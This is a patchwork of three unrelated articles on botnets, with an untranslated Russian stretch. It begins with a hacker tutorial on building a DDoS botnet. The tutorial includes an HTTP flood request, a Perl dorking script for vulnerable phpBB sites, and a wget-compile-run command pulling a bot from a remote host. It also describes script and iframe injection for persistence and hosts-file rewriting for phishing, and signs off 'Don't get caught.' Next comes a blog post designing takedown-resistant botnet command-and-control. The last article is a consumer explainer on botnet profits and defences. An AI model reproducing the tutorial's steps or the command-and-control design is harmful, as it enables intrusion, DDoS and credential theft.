Botnets. Botnet. How botnets are created. Means of protection against botnets. Collection of confidential information

Security systems are constantly being improved, programmers are becoming more experienced. Fewer and fewer well-known mistakes are now being made.

[prologue]
The Internet is growing with enormous force. It becomes increasingly difficult for a hacker to find vulnerabilities. Administrators use the coolest security experts to protect their products. Do you recognize your thoughts? In fact, the Internet is full of vulnerabilities, but they are of little use. Well, it depends on how you look at it. Now, imagine the situation, some online bastard has bothered you, you want to punish him. Today we will talk about creating your own combat botnet.
So, what is a “bot”. To an uninitiated person, stupid opponents immediately spring to mind computer games, which you will shoot in two minutes. Yes, this is partly true. In our case, a “bot” is a program that executes the commands embedded in it. It seems nothing special. Someone will object: “I wrote this when I was five years old, you press a button and the program, olla-la, closes.” Let’s forget childhood. We all know that the possibilities of coding are endless, and it can be used for good and evil. Of course, we always use our developments with good intentions. A “botnet” is a set of bots gathered in one center that simultaneously execute the owner’s commands. Bots, by the way, are mainly aimed more at Windows machines. Here you can steal your passwords, install a sox, and format a screw. I’ll deviate from the rules and tell you how to create a botnet from nix machines. The main function of our bot is to organize DDOS attacks. This is an ideal way to leverage the wide channels of nix servers. Let's do the math. The server that needs to be "downloaded" is on a 100Mb channel. That is, 10-20 bots standing on the same channel will overwhelm the server in an instant. If you can hide behind a firewall from one server, then, alas, there is no escape from more bots

[Write a bot]
You can find a listing of an example bot via the link at the end of the article. Let's look at the code a little. (uh, Dream again controls everything via IRC? It’s cooler via WEB!). By the way, control via IRC was chosen due to its interactivity. Let's say I want to use local nuclear exploits to attack a couple of servers in a botnet. I will simply execute the command SH uname -a using the bot and instantly find the computer I need. Then, by also executing the command in the IRC client, I will download the backdoor and receive an interactive shell for further actions. The possibilities are endless. You will say that such control can be implemented through the WEB, but why reload the page and waste traffic? It is much more convenient to observe everything in real time (although, with a botnet of more than 1000 bots, you can take care of the convenience of the interface - a common sense note). Many people think that organizing DDOS is a very difficult matter. Here is an example of a typical attack code:

GET /server.org HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 (X11; U; Windows 5.2 i686)\r\nHost: server.org:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso- 8859-1,*,utf-8\r\n\r\n

That is, we simply send a request to the server forcing it to respond. And we send it until the server crashes due to lack of traffic or processor time. But will you limit yourself to nix bots alone? You also need to create a Windows botnet, for example, based on AgoBot. To do this, you can create some code for the bot that will scan for lsasl/dcom vulnerabilities of machines that connect to the server on which the bot is installed.

[Creating a botnet]
Creating a botnet is actually very easy. To do this, we need to find a vulnerability in any web script. The found vulnerability should allow executing shell interpreter commands. When you find a vulnerability, pay attention to the name of the underlying file, its title, and the name of the vulnerable system. Now, using this data, you need to create a good search query. For example, let’s take a well-known vulnerability in phpBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") or next; print $sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n"; @resu =<$sock>; close($sock);

Wget http://server.org/bot.c;gcc bot.c -o bash;chmod +x bash;./bash;

Here you can see two problems at once. wget and gcc may not be available or their use will be prohibited. Here the fech, curl and get downloads or the lynx console browser will help us, or we can use the ftp protocol. Its implementation is more complicated, but the advantage is that ftp is everywhere. As for the compiler, you can simply compile the binary in your shell and hope that everything will be ok with compatibility, or you can rewrite the bot into interpreted languages ​​- Perl or PHP. Each method has its own advantages and disadvantages, which one to use is your choice. I'm used to using the captured server to the maximum. After all, a bot on a nix server will only last until the first reboot of the machine. There is one interesting way out of this situation. The bot will search for interpretable files (.pl, .php) available for writing and add the code for downloading and launching the bot to them. Or you can create another Windows botnet. This is also easy to implement. This requires a vulnerability in the Internet browser( Internet Explorer,Opera,Mozilla) which leads to the download and launch the desired file. Next, an inframe entry is created that loads our malicious code. This entry is added to all index files (or to all where there is html code, it all depends on your impudence). The small script Haz, which you will also find in the archive, does this job perfectly. The bagtrack is filled with records of critical vulnerabilities in Internet Explorer, so we will also have a botnet on Windows systems(I mentioned its advantages above). That's it, run our search worm on a high-speed shell, drink coffee (beer, vodka, tomato juice), go to the IRC channel specified in the bot's properties and observe the number of your subordinates. In conclusion, I want to say hello to everyone who knows me and wish you good luck. Don't get caught.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX

The vulnerability in phpBB is relevant until version 2.0.16, although the developers claim that they fixed it in 2.0.11

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

Phishing
It is very convenient to use bots as a phishing organization. To do this, we need special pages tailored for phishing that emulate the site we need and good hosting, dedicated server or VDS. You can make such pages yourself, buy them, or find them online. The choice is huge. Most often, phishing is organized on sites: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om and others, one way or another, related to e-commerce. Next, the Windows bot rewrites the \system32\drivers\etc\hosts file by adding the IP address of your server to it and assigning the alias of the site you need to it. The file format is:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

That is, by typing the sites e-gold.com and paypal.com into the browser, the user ends up on our server without suspecting anything. In turn, on the phisher’s server, entries about the corresponding domains are added to httpd.conf.

DocumentRoot "/home/e-gold.com/www" ServerName "www.e-gold.com" ServerAlias ​​"e-gold.com" "www.e-gold.com"

Of course, the browser line will contain the familiar e-gold.com address, and even an advanced user will log into the site without suspecting anything. To complete the picture, I will say that if the user uses a proxy server, then this method will not work

Bots for every taste
Agobot/Phatbot/Forbot/XtremBot
This is the best family of bots. Written in C++. They have many detection protection functions and more than 500 modifications due to a clearly defined modular structure.
SDBot/RBot/UrBot/UrXBot
Bots that are very popular at the moment for carrying out DDOS attacks. They have many additional functions. Such as opening Sock4, keylogger, automatic scanner for lsass and dcom vulnerabilities. It also has the function of redirecting requests to antivirus company sites to local server by editing \system32\drivers\etc\hosts and installing a small fake web server to port 80.
DSNX Bots
This bot can conduct DDOS attacks, port scanning and some other little things.
Q8 Bots
An excellent bot for nix systems. It is distinguished by its compact code (27 KB, consists of one file) and good functionality. Can be dynamically updated by downloading and launching a new file. Implements basic DDOS implementations well (SYN-flood, UDP-flood). Can perform system commands. It also camouflages well in the system.
kaiten
Also a good bot for Unix/Linux systems. Able to open a remote shell on a captured server.
Perl-based bots
These are very small bots written in Perl. Used for DDOS attacks on Unix-based systems.

---
The article has a big bias towards hacking, so if it’s not clear, ask.

It’s not for nothing that I published a draft of my note about peer-to-peer networks. Reader comments have been very helpful. They inspired me to further work in this direction. What came out of this - look under the cut.

As the title of the post suggests, today we will only talk about botnets. Let’s forget about file sharing, proxy networks, peer-to-peer blogs and p2p currency for a while.

The word “botnet” should not be understood as something illegal. When a user voluntarily downloads and installs a “bot” in order to donate their traffic and computing resources to the needs of a scientific project, this is also a botnet. Accordingly, the botmaster is not necessarily a criminal. A group of 30 scientists studying scientific project, this is also a “botmaster”.

1. Managing a botnet through a server

The easiest way to manage bots is to run an irc/http server. Through it, bots will receive commands and, with its help, send the result of their execution.

I draw as best I can :) In this case, an illustration may not be required, but I decided to prepare you for the shock that the rest of the drawings will produce.

• Very simple implementation, especially in the case of IRC.
• Fast response from bots.
• You can issue commands to the entire network or to a specific bot.
• If the network consists of hundreds of nodes, one channel in DalNet is enough to manage it. For larger networks, you can fork out for inexpensive (about 300 rubles/month) web hosting.
• In the case of HTTP-the server greatly simplifies the development of a beautiful UI. This is important if we use a botnet in some web service.

• Server load. The number of nodes in the largest botnets is measured in the millions. To manage such a crowd, one server is not enough.
• If something happens to the server (network failure, DDoS, fire in the data center), the network will come to an end.
• One server is easy to firewall. This can be done both by the provider and by Kaspersky Lab products on the user’s computer.
• The botmaster is relatively easy to find. Once I forgot about VPN - wait for guests in uniform.
• In the case of IRC, only online bots receive commands. If a bot enters the channel two minutes after sending the command, it will be “off topic”.
• The number of bots and their IP can be determined by going to the IRC channel. Protecting the channel with a password will not help, because the latter is easy to pick out from the bot’s code.

2. Control via IRC network

The logical step to combat the disadvantages of the previous method is to make not one server, but several. In my opinion, the easiest way to do this is by raising your IRC network. In this case, all responsibility for transferring data between servers falls on the IRC protocol. On the bot side there will be no difference compared to the previous solution.

• Simple implementation, although you will have to tinker with setting up servers.
• Bots still respond quickly to commands.
• You can still issue commands to a specific bot.
• Load distribution between servers, protection against DDoS and force majeure. Ten good servers may be enough for a network of a million bots.
• If some servers fail, you can have time to replace them.
• If using IRC and is confused by a thousand bots sitting on one channel, use several channels. Accordingly, you can give different parts of the network different tasks.

• You'll have to fork out more for servers/VDS.
• You can firewall all servers at the same time and the botmaster will not have time to replace them.
• The botmaster is still fairly easy to track down.
• In the case of IRC, the number of bots and their IPs are still in plain sight.
• Bots that have just entered the channel are not in the subject.

I first heard the term trust ring from my friend Nickolas in the comments to the previous post. We are talking about assigning the function of “servers” to part of the botnet.

• No servers needed.
• Trusting can consist of hundreds of nodes. It is not easy to raise and control such a number of irc/http servers.
• Bots should not be constantly connected to trusting. It is enough to check once every 5-10 minutes to see if new commands have appeared. Each command must have a TTL during which it is stored in trust.
• A large number of “servers” ensure the network’s resilience to all kinds of disasters. When part of the ring dies, the botmaster can give a command to create a new trastring. Or this can be done by the ring nodes themselves (digital signatures and consent of a certain percentage of trustees are required).
• Let trusting consist of 512 nodes, at least 50% are constantly online. If there are 1,000,000 bots in the network and each of them is constantly online, there will be less than 4,000 bots per trusting node. When the bot requests commands (or sends the result) once every 10 minutes, each ring node will simultaneously process an average of 7 connections. Quite a bit for a network of this size, right?
• Only the botmaster can obtain an accurate list of all bots.
• You can issue commands to a specific bot or group of bots.
• Fast response of bots to commands.
• Botmaster is hard to find.

The only negative I see is the complexity of implementation.

4. Peer-to-peer networks

According to Internet sources, P2P botnets are currently very popular. Among these sources, it deserves the most attention. Each node in such a network knows only a few “neighboring” nodes. The botmaster sends commands to several network nodes, after which it is transmitted from neighbor to neighbor.

The list of neighbors is given to bots once on a special server. This could be, for example, a hacked website. More server does nothing, it is only needed when adding nodes to the botnet.

• The implementation is somewhat simpler than in the previous paragraph.
• Minimum load on all network nodes. The size of a botnet is practically unlimited.
• Resistant to DDoS, node shutdowns, etc. It is almost impossible to firewall a p2p botnet.
• None permanent connections, as is the case with IRC.

• We need a server, even if only for a short time.
• Nodes die from time to time, which affects the connectivity of the network.
• To get a list of all bots, you need, for example, to give them a command to access a specific site. In this case, there is no guarantee that only the botmaster will receive the list.
• To issue a command to a specific node, you must either send it to the entire network or connect to the node directly.
• Slow response of bots to commands.
• To send a “long” command, for example, with a list of URLs, you need to use a third-party server, otherwise the bots’ response will slow down even more.
• It is easier to find a botmaster than in the previous example, due to the use of some kind of server.

Of course, I could be wrong, but in my opinion p2p botnets are much worse than trusting. Maybe antivirus manufacturers are keeping something quiet?

5. Complete solution

One way to invent something new and good is to cross something old. We combined a telephone, a computer, a tape recorder, a camera and a video camera - we got a smartphone. A computer and climate control in a car will no longer surprise anyone. Let's stick a magnet on the refrigerator to each yogurt, and sales will skyrocket.

It is important to remember that if the crossing is unsuccessful, we can get an individual that is good for nothing. Reminds me of genetic algorithms, doesn't it? Let's take, it would seem, good idea— p2p botnet, where trusting is responsible for assigning neighbors. Then we don't need any server!

But in this case the complexity of implementation will increase, albeit slightly. The remaining problems of the p2p botnet will remain unresolved. The win is insignificant, the score is 1:1.

After sitting for a while with a piece of paper and a pencil, I came up with the following idea. As far as I know, it has never been voiced before, and I am the first to come up with such an idea. ChSV plus 100.

What if the network has two states - “active” and “passive”. In a passive state, the botnet operates according to the p2p scheme. The botmaster sends the command “mobilize the troops” and the network turns into trusting. In his command, the botmaster must indicate the trusting nodes and the time for which the network changes its state. To make the ring larger, you can command several bots to name their neighbors. Further, all commands are transmitted through trusting. He is also responsible for assigning “neighbors” to new nodes. If the TTL of the ring subsequently turns out to be insufficient, the command “extend active state” can be given.

Such a botnet will not inherit any of the disadvantages of a p2p network and will have all the advantages of trusting, as well as the following:

• Increased resistance to DDoS attacks and network filters, like a p2p network.
• Minimal resource consumption by bots during network downtime. The botmaster does not need to monitor the state of the trusting and select new nodes for it.
• When creating a trusting, only those nodes that are currently online are selected. Bots will connect to the ring on the first try (for a while).
• The list of “neighbors” is periodically updated. All the same, the entire botnet knows the IP of the nodes included in the temporary ring. So let them consider these nodes to be neighbors if some of the real neighbors have not appeared on the network for a long time.

And the only drawback I see here is the complexity of implementation. But this isn't really a problem.

6. Things to remember

Until now, I have kept silent about some points, because they are inherent in any of the named methods of managing a botnet. You should pay attention to them.

• Some nodes cannot accept incoming connections due to a firewall or NAT. At a minimum, this needs to be taken into account when writing a bot. For example, when distributing commands in a p2p network, the bot itself must periodically contact its neighbors, and not wait for commands from them.
• It should be assumed that all commands sent to the network are listened to. At a minimum, an interested party can modify the bot's code for these purposes. However, it makes sense to encrypt all traffic sent on the network. At a minimum, this will complicate the analysis of the botnet.
• All botmaster commands must be digitally signed. Passwords are not good because they can be intercepted.
• Since we are talking about implementation, I note that any botnet must have at least three commands - updating bots, updating the botmaster key, and self-destructing the entire network.
• There are “spy” nodes on the network. Some of them are included in trusting. At the same time, we do not know the goals that these “spies” are pursuing - this could be identifying the botmaster’s IP, disrupting the execution of commands, disabling the network, gaining control over the botnet, and so on. Specifically, this means that bots must choose a random node when connecting to a ring, rather than using the same one all the time.
• In the figure, the trustring nodes are connected each to each other, but it is much more practical to implement the ring in the form of a small p2p network, that is, according to the “neighbors” principle.

I will also note that solutions 1 and 2 (server, many servers) lose many of their disadvantages and gain a couple of advantages from solution 3 (trastring) when using the HTTP protocol. Scroll through these points again to see what I mean.

7. Conclusions

For small networks good decision is to use IRC. For example, if you want to create your own small network for distributed computing, install the bot on home computer, laptop, netbook, work computer (if company policy allows it) and manage the network via DalNet. If necessary, later the network can be “pumped” to trusting. You will provide the appropriate command, right?

If the botnet needs a nice web interface, it might make sense to write an additional program that will take commands from the web server and send them to IRC. At least consider this approach.

Universal solutions are trusting and p2p+trastring. Such networks will work perfectly no matter how many nodes they have, 1 or 1,000,000, without any servers.

Due to the obvious disadvantages of pure p2p compared to a ring, it remains unclear to me why it is considered a good solution. Surely the bots that make up the network contain many useful functions. Why not add another small payload - network mobilization into trusting?

That's probably all. I will be glad to see any of your comments. Especially with criticism, pointing out inaccuracies/contradictions in the text and your ideas about the topic raised.

Today, botnets have become one of the main tools of cybercriminals. ComputerBild will tell you what botnets are, how they work, and how to save your computer from falling into a zombie network.

A botnet, or zombie network, is a network of computers infected with malware that allows attackers to remotely control other people's machines without their owners' knowledge. In recent years, zombie networks have become a stable source of income for cybercriminals. Consistently low costs and a minimum of knowledge required to manage botnets contribute to the growth of popularity, and therefore the number of botnets. Attackers and their customers earn thousands of dollars from DDoS attacks or spam mailings carried out using zombie networks.

Is my computer infected with a bot?

It is not easy to answer this question. The fact is that it is almost impossible to track the interference of bots in the daily operation of a PC, since it does not in any way affect the performance of the system. Nevertheless, there are several signs by which you can determine that there is a bot in the system:

Unknown programs are trying to connect to the Internet, which is periodically reported indignantly by the firewall or antivirus software;

Internet traffic becomes very high, although you use the Internet very sparingly;

New ones appear in the list of running system processes, masquerading as normal Windows processes (for example, a bot may be named scvhost.exe - this name is very similar to the name of the system Windows process svchost.exe; It's quite difficult to notice the difference, but - Can).

Why are botnets created?

Botnets are created to make money. There are several areas of commercially profitable use of zombie networks: DDoS attacks, collection confidential information, sending spam, phishing, search spam, cheating click counters, etc. It should be noted that any direction that the attacker chooses will be profitable, and the botnet allows you to carry out all of these types of activities simultaneously.

DDoS attack (from the English Distributed Denial-of-Service) is an attack on computer system, for example, on a website, the goal of which is to bring the system to a “fall,” that is, a state where it can no longer accept and process requests from legitimate users. One of the most common methods of carrying out a DDoS attack is sending numerous requests to the victim computer or website, which leads to a denial of service if the resources of the attacked computer are insufficient to process all incoming requests. DDoS attacks are a formidable weapon for hackers, and a botnet is an ideal tool for carrying them out.

DDoS attacks can be both a means of unfair competition and acts of cyber terrorism. The owner of a botnet can provide a service to any not too scrupulous entrepreneur - carry out a DDoS attack on the website of his competitor. After such a load, the attacked resource will “go down”, the attacker will receive a temporary advantage, and the cybercriminal will receive a modest (or not very) reward.

In the same way, botnet owners themselves can use DDoS attacks to extort money from large companies. At the same time, companies prefer to comply with the demands of cybercriminals, since eliminating the consequences of successful DDoS attacks is very expensive. For example, in January 2009, one of the largest hosters, GoDaddy.com, suffered a DDoS attack, as a result of which thousands of sites hosted on its servers were unavailable for almost a day. Financial losses the hosters were huge.

In February 2007, a series of attacks were carried out on root DNS servers, on the operation of which the normal functioning of the entire Internet directly depends. It is unlikely that the purpose of these attacks was to collapse the World Wide Web, since the existence of zombie networks is only possible if the Internet exists and functions normally. Most of all, it was like a demonstration of the power and capabilities of zombie networks.

Advertisements for DDoS attack services are openly posted on many relevant forums. Prices for attacks range from 50 to several thousand dollars per day continuous operation DDoS botnet. According to the website www.shadowserver.org, in 2008, about 190 thousand DDoS attacks were carried out, from which cybercriminals were able to earn about 20 million dollars. Naturally, this amount does not include income from blackmail, which is simply impossible to calculate.

Collection of confidential information

Confidential information stored on users' computers will always attract attackers. The numbers are of greatest interest credit cards, financial information and passwords to various services: mailboxes, FTP servers, instant messengers, etc. At the same time, modern malware allow attackers to select exactly the data that is interesting to them - to do this, just download the corresponding module to the PC.

Attackers can either sell the stolen information or use it to their advantage. On numerous forums on the Internet, hundreds of advertisements for the sale of bank accounts appear every day. The cost of the account depends on the amount of money in the user's account and ranges from $1 to $1,500 per account. The lower limit indicates that in the course of competition, cybercriminals engaged in this type of business are forced to reduce prices. To really earn a lot, they need a stable influx of fresh data, and for this a stable growth of zombie networks is required. Financial information is especially interesting for carders - criminals involved in counterfeiting bank cards.

How profitable such operations are can be judged by the well-known story of a group of Brazilian cybercriminals who were arrested two years ago. They were able to withdraw $4.74 million from the bank accounts of ordinary users using information stolen from computers. Criminals who are involved in forging documents, opening false bank accounts, making illegal transactions, etc. are also interested in acquiring personal data that is not directly related to the user’s money.

Another type of information collected by botnets is addresses Email, and, unlike credit card and account numbers, from address book One infected PC can be recovered from many email addresses. The collected addresses are put up for sale, sometimes “in bulk” - by the megabyte. The main buyers of such “products” are spammers. A list of a million e-mail addresses costs from 20 to 100 dollars, and mailings ordered to spammers to the same million addresses cost 150-200 dollars. The benefit is obvious.

Criminals are also interested Accounts various paid services and online stores. Of course, they are cheaper than bank accounts, but their implementation is associated with a lower risk of prosecution by law enforcement agencies.

Millions of spam messages circulate around the world every day. Sending unsolicited mail is one of the main functions of modern botnets. According to Kaspersky Lab, about 80% of all spam is sent through zombie networks. From computers law-abiding users Billions of letters are sent with advertisements for Viagra, copies of expensive watches, online casinos, etc., clogging communication channels and mailboxes. In this way, hackers put the computers of innocent users at risk: the addresses from which the mailings are sent end up on the blacklists of antivirus companies.

In recent years, the scope of spam services itself has expanded: ICQ spam appeared, spam in in social networks, forums, blogs. And this is also a “merit” of the owners of botnets: after all, it’s not at all difficult to add an additional module to the bot client, which opens up horizons for new business with slogans like “Spam on Facebook. Inexpensive." Spam prices vary depending on the target audience and the number of addresses to which the mailing is sent. Prices for targeted mailings range from $70 for hundreds of thousands of addresses to $1,000 for several tens of millions of addresses. Over the past year, spammers earned about $780 million from sending emails.

Creating search spam

Another use case for botnets is to increase the popularity of websites in search engines. Working on search engine optimization, resource administrators try to increase the site’s position in search results, since the higher it is, the more visitors will access the site through search engines and, therefore, the greater the site owner’s revenue, for example, from the sale of advertising space on web pages. Many companies pay webmasters a lot of money to bring their website to the top positions in search engines. Botnet owners took advantage of some of their techniques and automated the search engine optimization process.

When you see in the comments to your post in LiveJournal or a successful photo posted on a photo hosting site, a lot of links created by a person unknown to you, and sometimes by your “friend”, don’t be surprised: someone just ordered the promotion of their resource to the owners botnet. A specially created program is downloaded onto a zombie computer and, on behalf of its owner, leaves comments on popular resources with links to the site being promoted. The average price for illegal search spam services is about $300 per month.

How much does personal data cost?

The cost of stolen personal data directly depends on the country in which its rightful owner lives. For example, complete data of a US resident costs 5-8 dollars. On the black market, the data of residents of the European Union is especially valuable - it is two to three times more expensive than the data of citizens of the United States and Canada. This can be explained by the fact that such data can be used by criminals in any EU country. The average price around the world for a complete package of data about one person is about $7.

Unfortunately, for those who decide to organize a botnet from scratch, it will not be difficult to find instructions on the Internet for creating a zombie network. First step: create a new zombie network. To do this, you need to infect users’ computers with a special program - a bot. For infection, spam mailings, posting messages on forums and social networks and other techniques are used; Often a bot is equipped with a self-propagation function, like viruses or worms.

Social engineering techniques are used to force a potential victim to install a bot. For example, they offer to watch an interesting video, which requires downloading a special codec. After downloading and running such a file, the user, of course, will not be able to watch any video and most likely will not notice any changes at all, and his PC will be infected and become an obedient servant, carrying out all the commands of the botnet owner.

The second widely used method of bot infection is drive-by downloading. When a user visits an infected web page, malicious code is downloaded onto his computer through various “holes” in applications - primarily in popular browsers. Used to exploit weak points special programs- exploits. They allow you not only to silently download, but also to silently launch a virus or bot. This type of malware distribution is the most dangerous, because if a popular resource is hacked, tens of thousands of users will become infected!

The bot can be equipped with a self-propagation function computer networks. For example, it can spread by infecting all available executable files or by searching for and infecting vulnerable computers on a network.

The botnet creator can control infected computers of unsuspecting users using command center botnet by contacting bots through an IRC channel, web connection, or any other available means. It is enough to connect several dozen machines into a network for the botnet to begin generating income for its owner. Moreover, this income is linearly dependent on the stability of the zombie network and its growth rate.

Online advertising companies operating under the PPC (Pay-per-Click) scheme pay money for unique clicks on links on advertisements posted on the Internet. For botnet owners, defrauding such companies is a profitable business. For example, we can take the well-known Google network AdSense. Advertisers included in it pay Google for clicks on posted ads in the hope that the user who drops by will buy something from them.

Google, in turn, posts contextual advertising on various sites participating in the AdSense program, paying the site owner a percentage of each click. Alas, not all website owners are honest. With a zombie network, a hacker can generate thousands of unique clicks per day, one from each machine, without arousing much suspicion from Google. Thus, the money spent on the advertising campaign will flow into the pocket of the hacker. Unfortunately, there has not yet been a single case where anyone has been held accountable for such actions. According to Click Forensics, in 2008, about 16-17% of all clicks on advertising links were fake, of which at least a third were generated by botnets. After performing simple calculations, you can understand that last year the owners of botnets “raked in” $33,000,000. Good income from mouse clicks!

Attackers and dishonest businessmen do not necessarily have to create a botnet from scratch on their own. Botnets are the most different sizes and productivity they can buy or rent from hackers - for example, by turning to specialized forums.

The cost of a finished botnet, as well as the cost of renting it, directly depends on the number of computers included in it. Ready-made botnets are most popular on English-language forums.

Small botnets, consisting of several hundred bots, cost between $200 and $700. Wherein average price one bot is approximately 50 cents. Larger botnets cost more money.

The zombie network Shadow, which was created several years ago by a 19-year-old hacker from Holland, consisted of more than 100 thousand computers located around the world, and was sold for 25,000 euros. For this money you can buy a small house in Spain, but a criminal from Brazil chose to purchase a botnet.

Botnet Protection Tools

1. First of all, these are anti-virus programs and comprehensive packages for protection against Internet threats with regularly updated databases. They will help not only to detect danger in time, but also to eliminate it before your faithful “iron friend”, turned into a zombie, begins to send spam or “drop” sites. Comprehensive packages, such as Kaspersky Internet Security 2009, contain a full set of protective functions, which can be controlled through a common command center.

Antivirus module in background scans the most important system areas and controls all possible routes of virus invasion: email attachments and potentially dangerous websites.

The firewall monitors communication between personal computer and the Internet. It checks all data packets received from or sent to the Network and, if necessary, blocks network attacks and prevents private data from being secretly sent over the Internet.

Spam filter protects Mailbox from penetration of advertising messages. Its tasks also include identifying phishing emails, with the help of which attackers try to extract information from the user about his login credentials for online payment or banking systems.

2. Regular update operating system, web browsers and other applications, whose developers discover and eliminate many gaps in their protection, as well as weaknesses exploited by attackers.

3. Special encryption programs will protect your personal data, even if the bot has already penetrated the computer, because to access it he will have to crack the password.

4. Common sense and caution. If you want to protect your data from various types of threats, you should not download and install programs of unknown origin, open archives with files despite antivirus warnings, visit sites that your browser flags as dangerous, etc.

We thank Kaspersky Lab for their assistance in preparing the material